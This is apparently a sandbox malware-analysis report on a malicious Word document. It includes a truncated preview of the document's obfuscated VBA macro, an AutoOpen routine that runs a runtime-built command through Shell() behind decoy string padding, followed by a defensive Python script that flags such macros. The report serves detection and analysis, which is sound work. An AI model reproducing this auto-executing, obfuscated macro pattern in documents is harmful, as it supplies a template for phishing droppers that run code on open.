Verdict: MALICIOUS
Risk Score: 204
Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document carrying VBA macros. Its AutoOpen macro passes the return value of the function aLjmEEhVw to Shell(), so a command string is built at runtime and executed as soon as the document is opened. The part of aLjmEEhVw visible in the preview below consists of decoy string and array assignments and Mid() slices whose results are never used in the visible lines, so the actual command is not recoverable from the static preview alone; the ClamAV signature Doc.Macro.Obfuscation-6355576-0 names this padding style directly. Taken together, the signature hit, the AutoOpen entry point and the Shell() call indicate a document built to execute a secondary payload on open. No download URL was recovered from the macro text (the only extracted URL is a benign XML namespace), so any download stage is inferred from the pattern rather than observed.
Heuristics (7)

- critical CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
- medium OLE_VBA_MACROS: Document contains VBA macro code (2 related findings)
- critical OLE_VBA_SHELL: Shell() call in VBA
- high OLE_VBA_AUTOOPEN: AutoOpen macro
- medium OLE_LEGACY_WORDBASIC_AUTOEXEC: The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this heuristic reports old Word macro execution surface only; it is not a downloader or parser-CVE attribution. Its generic description ("no modern VBA project was recovered") does not apply to this sample, since olevba did recover a VBA project (see macros.bas below), so treat this marker as redundant with the AutoOpen finding above rather than as independent evidence.
- info EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- info EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it. URL: http://schemas.openxmlformats.org/drawingml/2006/main, seen in document text (OLE body). This is the standard DrawingML XML namespace URI and is expected in any document that embeds drawing objects; it is not an indicator of compromise and should not be treated as C2.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 247764 bytes | 1187a391dd28e948eba9aa73f7eeca48e542fe56172660f6de93ff5b7a0b35b7 |

Detection for macros.bas:
- ClamAV: no threats found. The Doc.Macro.Obfuscation-6355576-0 hit above fired on the document file itself, not on the decoded VBA text, so the two results are not in conflict; when pivoting on the signature, hash the original document rather than the carved source.
- Obfuscation or payload: likely. The carved artifact contains 128 long base64-like blobs. The long alphanumeric literals visible in the preview are what this check counts; in the visible portion each one is sliced with Mid() into a variable that is never read again, so most are decoys rather than an encoded payload, and 247,764 bytes of source for a macro of this shape is itself a padding indicator.
Preview script: first 1,000 lines of the extracted script. The two `Attribute VB_Name` lines show that olevba concatenated two modules into macros.bas: the ThisDocument class module (attributes only) and the code module AYuNbfBaL that holds AutoOpen and aLjmEEhVw.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AYuNbfBaL"
Sub AutoOpen()
wfnLJAFFp = "VzhGnAMtE" + "UriOfWTWJ" + "zSFizZPXp" + "wpjYfWTpS"
Shell$ aLjmEEhVw, 0
QLiFUTWjY = "ihAQrnqHn" + "kmzHrPKND" + "UwLIuqEDK" + "fszmMRAjp"
End Sub
Function aLjmEEhVw()
FpwjzPaM = "jaCFLqnRkN2ZMjIYXidIuXKb2QOTojtwskhizUXjYXAUqHFClUHzVDihkTBBaWzmHVAEHTMTKcRRiZIQkLhUZtcoFzwdTWGCZOMUGAuSH4E4dNZMCF"
uRiqa = Mid(FpwjzPaM, 27, 79)
qOqDcdzulU = Array("HUzcSKca", "UjXdSJEr", "zpozYjZt", "iHVbKwZr", "SvcIjjEm")
qcmWftdkwRf = Array("XXKEfWTF", "UNzswwja", "uGtKpBPX", "JjLXjwKT", "lCbAWVNM")
CUdLf = Array("oPHwwhuV", "PCNamtzW", "ImuzKwZX", "CjHuVjEY", "thWZtSbc")
zSSPvjpGj = "CvzrOPT24HLzJPoH2J1ZlbIfMQrsFJktzvho"
RfIzr = Mid(zSSPvjpGj, 22, 8)
WUpwuikBQS = Array("mpIdikhs", "FErkbOBr", "pjuQazAi", "wphFXXdp", "KRMVovpS")
AFYVsLBjbq = Array("wOpRoTwi", "jijKYKCm", "pZftDcVh", "bBZJBfDu", "ubRLJjui")
PfOSPVLjP = Array("sCZsnSRA", "PajOPvOW", "tIqmtmdA", "bpPwsqcG", "iBBBDcuI")
oBKkZUGRQzq = "JWZtfZraqUhBHofJcouaISAuaDOKATiwjBqbEjDGauISQEEhwESrYmjooNScLjZXmiUGwEFtlnzNJhdWwjMv6fYPFmH1"
KkcPP = Mid(oBKkZUGRQzq, 4, 81)
jCklNaiVWM = Array("kZubzoiw", "MvRBsHkF", "YYQzCUIY", "zajOuNTR", "NhCUsCAm")
tZhmlZ = Array("LRjzZaNX", "QwciLwFP", "QWdZEPEz", "bAnLFQMW", "YimlkLwW")
ElmPJkw = Array("NMwwkpFR", "cmDWYbiv", "NkVZnBRA", "jGGhKTiF", "XHMrRGOl")
AGawPMc = "UbCwdwJKzinaRIwftjFRzTshhQnjwZJTjtsTjjfLi3cEOuQHEl6YO1KZkDX0vsQ9SUUtEu6"
dVfhRPib = Mid(AGawPMc, 6, 35)
wWotAto = Array("uWjTMqzw", "wqYApZjL", "vzPdjXGI", "HwzRPqiH", "VkiQSwns")
AjJPTPOw = Array("JJlUviQz", "XBwTqkCW", "PaLNrfhF", "LRiEvTsw", "JWUZmmMd")
tzwZtEwoi = Array("iBtOtKQl", "hHAsnaBd", "cfIizLBE", "IAJUQckd", "NifpmSMB")
ACpEV = "Xw7fj1IrRFLjPlJ5Dioo17zNYIoWiPWOlpVtvStUurmZPPWPmKwpNZdUtzmiSEEDnbjXnGSLMtzpZKfNoVrPHvhMLAAvjPCqmjlnizbfrncUboviTZqwNpvsuTLmGWaP"
tcHtlKziYdh = Mid(ACpEV, 33, 94)
likNHofB = Array("BtXoSzJj", "VqzGdidW", "zoFtAvUF", "WXiFuLrJ", "THcFoNmI")
DbThKvW = Array("qZzZidzf", "EIqzNSAF", "ZRRuVEpK", "wnnWFYil", "CwCawuat")
ddCoKWI = Array("YwAlUuwA", "HXjWwrnm", "kobqpcZj", "aEuQPZJi", "qXWWDDpE")
laLbjdvKF = "M82m9EoPwnbsZYNGOsjLjvcLkdZGkvtGzhKomdoXhY"
KMvnsnEdhd = Mid(laLbjdvKF, 16, 15)
UhjGrQSGT = Array("rmPirLpK", "JQqHTjDv", "ZULQzflh", "NCjYUQij", "zXzDNroO")
zOtIrw = Array("PkHzjBLH", "UbzisZEM", "BhUpfQqt", "hJIwkAii", "jwAPYmwM")
DSFONnfprY = Array("rYEtSAoZ", "SmBfWzjz", "uORatOWU", "tPBwYpoP", "jIwGMwah")
sjfuZ = "51Ohu7zk2wE2HO7jKXGJnmTQGqsrQMONAHjmdDEihKzQSuawbuzFuizfrmOZiwfFzBQIZkFHTccdmCzMPuPVPJSWKAuroivifuSQdSZrpqmSBTsooCKoiJqoitwYpaFB1lHZ8PwmORdF"
rtrwRVLFc = Mid(sjfuZ, 16, 110)
bISsps = Array("UjdzwCMh", "MBVJUXTc", "CjzDwsAd", "wmvNAdmz", "nkFJkYWq")
jLLzwkJwi = Array("DUjXTiuL", "pVEcwWic", "iAzMHwjj", "OYVkSJrd", "NJAdJdJT")
rUsXr = Array("rjXfYKAR", "BdbkZJjE", "ozIvIKtj", "iaOnWESE", "rfUXbBKE")
YKABwjOjt = "Yl0Q7wwSMPQPFWuudbpc"
hzmQUl = Mid(YKABwjOjt, 7, 8)
mjEomjEfK = Array("XEiphHDD", "ZwpKVNKj", "qqBwvNuz", "KXstoLdm", "oEYDcEzW")
zpDiiNz = Array("WKNaOIji", "UohkAMIK", "JliKPJPO", "TCVQoHEl", "riblzUiB")
jUqbIquMz = Array("nOZAismb", "wOtqZoHN", "vzHMmSpN", "jvsVlXKp", "DcWAkOja")
PQuqiDmpjo = "orBavcdKGtAZAsGtCCwJaDKdSjrdnH5wSjOIR4Gmz"
tKaNuaj = Mid(PQuqiDmpjo, 2, 28)
dWsERrLijEv = Array("QuUaNOMC", "XOpzNWPV", "YLRiARpY", "DEnwSGch", "PjvszOAV")
YUpta = Array("iqwXhKbh", "NBcZwBaz", "FvXIaQkR", "lIkjaXXK", "KwzJTRrs")
VVCPz = Array("cGiQiCkO", "GwmBrsuS", "FjlZavGq", "iROABQjn", "EifUhTnj")
ZDMMGl = "vOaXJqaIQtRtUAQidubzHAKIfmEQHNuKdnF2Ezd9NwsIB88abHhRiTwN93c6jJF"
abaWO = Mid(ZDMMGl, 5, 29)
XChJMCTP = Array("XWZdkVSS", "CjEmfRSh", "zsmMokMq", "QzzMMZll", "tCBEVdGI")
mojDFmCiqVN = Array("wwwVLtHm", "MwVohavn", "JjNkYGFc", "uSsdQNLW", "mdNsmriW")
ZPIufDi = Array("sKAOEzES", "HOumPVks", "qVatAiWw", "mzCDNDBR", "EqsOFrYz")
kBBDzmZOhzk =
' ... (truncated)
```
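The heuristics above (auto-exec entry point, Shell() call, base64-like blobs) and the obfuscation verdict on macros.bas are the kind of checks a static triage pass makes over decoded VBA. The following is an added example, not code from the report or from the analyzer, that reproduces those checks on the visible part of the preview and adds one the report only implies: the share of assigned variables that are never read, which is what the decoy padding in aLjmEEhVw looks like statistically. The regexes, the 32-character blob threshold, the 50% dead-store threshold and the OBFUSCATION_LIKELY tag are this example's own assumptions; OLE_VBA_AUTOOPEN and OLE_VBA_SHELL reuse the report's heuristic IDs. Both input strings are constructed (the first from the preview, the second a benign macro for contrast).

```python
# Added example: static triage of decoded VBA source. Not the analyzer's own
# code; regexes, thresholds and the OBFUSCATION_LIKELY tag are assumptions.
import re
from collections import Counter

# Constructed from the visible portion of the report's macros.bas preview.
SAMPLE_VBA = r'''Attribute VB_Name = "AYuNbfBaL"
Sub AutoOpen()
wfnLJAFFp = "VzhGnAMtE" + "UriOfWTWJ" + "zSFizZPXp" + "wpjYfWTpS"
Shell$ aLjmEEhVw, 0
QLiFUTWjY = "ihAQrnqHn" + "kmzHrPKND" + "UwLIuqEDK" + "fszmMRAjp"
End Sub
Function aLjmEEhVw()
FpwjzPaM = "jaCFLqnRkN2ZMjIYXidIuXKb2QOTojtwskhizUXjYXAUqHFClUHzVDihkTBBaWzmHVAEHTMTKcRRiZIQkLhUZtcoFzwdTWGCZOMUGAuSH4E4dNZMCF"
uRiqa = Mid(FpwjzPaM, 27, 79)
qOqDcdzulU = Array("HUzcSKca", "UjXdSJEr", "zpozYjZt", "iHVbKwZr", "SvcIjjEm")
zSSPvjpGj = "CvzrOPT24HLzJPoH2J1ZlbIfMQrsFJktzvho"
RfIzr = Mid(zSSPvjpGj, 22, 8)
End Function
'''

# Constructed benign macro for contrast: every variable it assigns is read back.
BENIGN_VBA = '''Sub FormatReport()
total = 0
For Each c In Selection.Cells
total = total + c.Value
Next c
MsgBox total
End Sub
'''

# Auto-executing entry points Word/Excel run without user interaction.
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+'
    r'(AutoOpen|AutoExec|AutoClose|AutoNew|Document_Open|Workbook_Open)\b',
    re.I | re.M)
SHELL_RE = re.compile(r'\bShell\b', re.I)       # also hits "Shell$": the $ sits outside the word
MID_RE = re.compile(r'\bMid\$?\s*\(', re.I)     # Mid()/Mid$() slicing of long literals
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=', re.M)  # "name = ..." at line start
IDENT_RE = re.compile(r'\b[A-Za-z_]\w*\b')
STRING_RE = re.compile(r'"[^"\n]*"')
B64_RE = re.compile(r'[A-Za-z0-9+/]{32,}={0,2}')  # 32+ chars of the base64 alphabet


def triage_vba(src: str) -> dict:
    """Count the indicators the report's heuristics look for, plus dead stores."""
    code = STRING_RE.sub('""', src)   # blank literals so their text is not counted as identifiers
    assigned = Counter(ASSIGN_RE.findall(code))
    uses = Counter(IDENT_RE.findall(code))
    # A name whose every occurrence is an assignment is never read: a decoy store.
    dead = [name for name, n in assigned.items() if uses[name] == n]
    return {
        "autoexec": AUTOEXEC_RE.findall(src),
        "shell_calls": len(SHELL_RE.findall(code)),
        "mid_slices": len(MID_RE.findall(code)),
        "base64_like_blobs": len(B64_RE.findall(src)),   # counted on raw source, inside literals
        "assigned_vars": len(assigned),
        "dead_stores": len(dead),
    }


def classify(findings: dict) -> list:
    """Map counts to (severity, tag) pairs in the style of the report's heuristics."""
    flags = []
    if findings["autoexec"]:
        flags.append(("high", "OLE_VBA_AUTOOPEN"))
    if findings["shell_calls"]:
        flags.append(("critical", "OLE_VBA_SHELL"))
    padded = (findings["assigned_vars"] >= 5
              and findings["dead_stores"] / findings["assigned_vars"] > 0.5)
    if findings["base64_like_blobs"] or padded:
        flags.append(("medium", "OBFUSCATION_LIKELY"))  # assumed tag, not a report heuristic ID
    return flags


if __name__ == "__main__":
    for label, src in (("macros.bas excerpt", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        f = triage_vba(src)
        print(label, f, classify(f))
```

On the excerpt this reports one AutoOpen entry point, one Shell call, two Mid() slices, two base64-like literals and five of seven assigned variables never read; the benign macro produces no flags. The dead-store ratio is the useful addition: signature-based checks can be defeated by renaming, but a function whose body is mostly unread assignments still stands out, and it is cheap to run over all 247 KB of the real artifact rather than just the first 1,000 lines.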